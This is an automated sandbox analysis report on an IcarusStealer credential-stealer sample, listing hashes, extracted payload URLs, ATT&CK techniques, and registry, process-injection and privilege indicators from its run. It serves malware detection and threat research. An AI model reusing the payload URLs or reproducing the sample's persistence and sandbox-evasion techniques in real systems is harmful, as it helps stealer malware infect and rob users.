icarusstealer | 359ad5a8f9bf0c74f4963db5bd5d81c31576f78e4e2e631409f3700821ed7f43

Analysis

max time kernel
191s
max time network
198s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
05/03/2024, 19:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

teset.exe
Size

690.0MB
MD5

359d0c3424b46b9947f63aac496ccd48
SHA1

79dec290fdf8c12e3949321e8df5bcaf7ccc1d18
SHA256

359ad5a8f9bf0c74f4963db5bd5d81c31576f78e4e2e631409f3700821ed7f43
SHA512

f0ac2b6c0fdff47562c97007311ef91b71279e52de83312789973d5183f285a007654da341c21b3c0697909092b34d8ee00c03a30d58f51e813aa3b2e9e9b8e7
SSDEEP

12288:rmJUQBuLut6N6LqQzJqkKAulc84bYBbuB1t4cWWzDKuVAccIpGNJ+Qh:4BZ6N6LqQzJqkW

Score

10^/10

icarusstealer persistence stealer

Malware Config

Extracted

Family

icarusstealer

Attributes

payload_url
https://blackhatsec.org/add.jpg

https://blackhatsec.org/remove.jpg

Signatures

IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
stealer icarusstealer

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Executes dropped EXE 1 IoCs

pid	Process
3140	MSBuilds.exe

Enumerates connected drives 3 TTPs 2 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\D:	explorer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
5	raw.githubusercontent.com
2	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	ipinfo.io

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3612 set thread context of 2304	3612	teset.exe	77

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\2717123927\3950266016.pri	explorer.exe
File created	C:\Windows\rescache\_merged\1601268389\3877292338.pri	SearchUI.exe
File created	C:\Windows\rescache\_merged\4032412167\2900507189.pri	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 22 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities	explorer.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchUI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchUI.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000\Software\Microsoft\Internet Explorer\GPU	SearchUI.exe

Modifies registry class 29 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23"	SearchUI.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010005000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c100000000000002000000e80703004100720067006a006200650078002000200033000a005600610067007200650061007200670020006e007000700072006600660000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000074ae2078e323294282c1e41cb67d5b9c000000000000000000000000a4ef259c376fda0100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e80703004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000073ae2078e323294282c1e41cb67d5b9c00000000000000000000000089ec7f9a376fda0100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b00360051003800300039003300370037002d0036004e00530030002d003400340034004f002d0038003900350037002d004e00330037003700330053003000320032003000300052007d005c004a0076006100710062006a0066002000510072007300720061007100720065005c005a0046004e00460050006800760059002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000000000000e80702004e0070006700760062006100660020006100720072007100720071002e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000fffffffff9a6406d323dcb4f8a86be992e03dc760000000000000000000000009d75ec5ea164da0100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133529782112836936"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23"	SearchUI.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1531961169-1615826105-2188682873-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3612	teset.exe
3140	MSBuilds.exe
3224	powershell.exe
1072	powershell.exe
3140	MSBuilds.exe
1072	powershell.exe
3224	powershell.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3224	powershell.exe
1072	powershell.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe
3140	MSBuilds.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeDebugPrivilege	3612	teset.exe
Token: SeShutdownPrivilege	3304	explorer.exe
Token: SeCreatePagefilePrivilege	3304	explorer.exe
Token: SeShutdownPrivilege	3304	explorer.exe
Token: SeCreatePagefilePrivilege	3304	explorer.exe
Token: SeShutdownPrivilege	3304	explorer.exe
Token: SeCreatePagefilePrivilege	3304	explorer.exe
Token: SeDebugPrivilege	2304	cvtres.exe
Token: SeShutdownPrivilege	3304	explorer.exe
Token: SeCreatePagefilePrivilege	3304	explorer.exe
Token: SeDebugPrivilege	3140	MSBuilds.exe
Token: SeDebugPrivilege	3224	powershell.exe
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeShutdownPrivilege	3304	explorer.exe
Token: SeCreatePagefilePrivilege	3304	explorer.exe
Token: SeShutdownPrivilege	3304	explorer.exe
Token: SeCreatePagefilePrivilege	3304	explorer.exe
Token: SeShutdownPrivilege	3304	explorer.exe
Token: SeCreatePagefilePrivilege	3304	explorer.exe
Token: SeShutdownPrivilege	3304	explorer.exe
Token: SeCreatePagefilePrivilege	3304	explorer.exe
Token: SeShutdownPrivilege	3304	explorer.exe
Token: SeCreatePagefilePrivilege	3304	explorer.exe
Token: SeShutdownPrivilege	3304	explorer.exe
Token: SeCreatePagefilePrivilege	3304	explorer.exe
Token: SeShutdownPrivilege	3304	explorer.exe
Token: SeCreatePagefilePrivilege	3304	explorer.exe
Token: SeShutdownPrivilege	3304	explorer.exe
Token: SeCreatePagefilePrivilege	3304	explorer.exe
Token: SeShutdownPrivilege	3304	explorer.exe
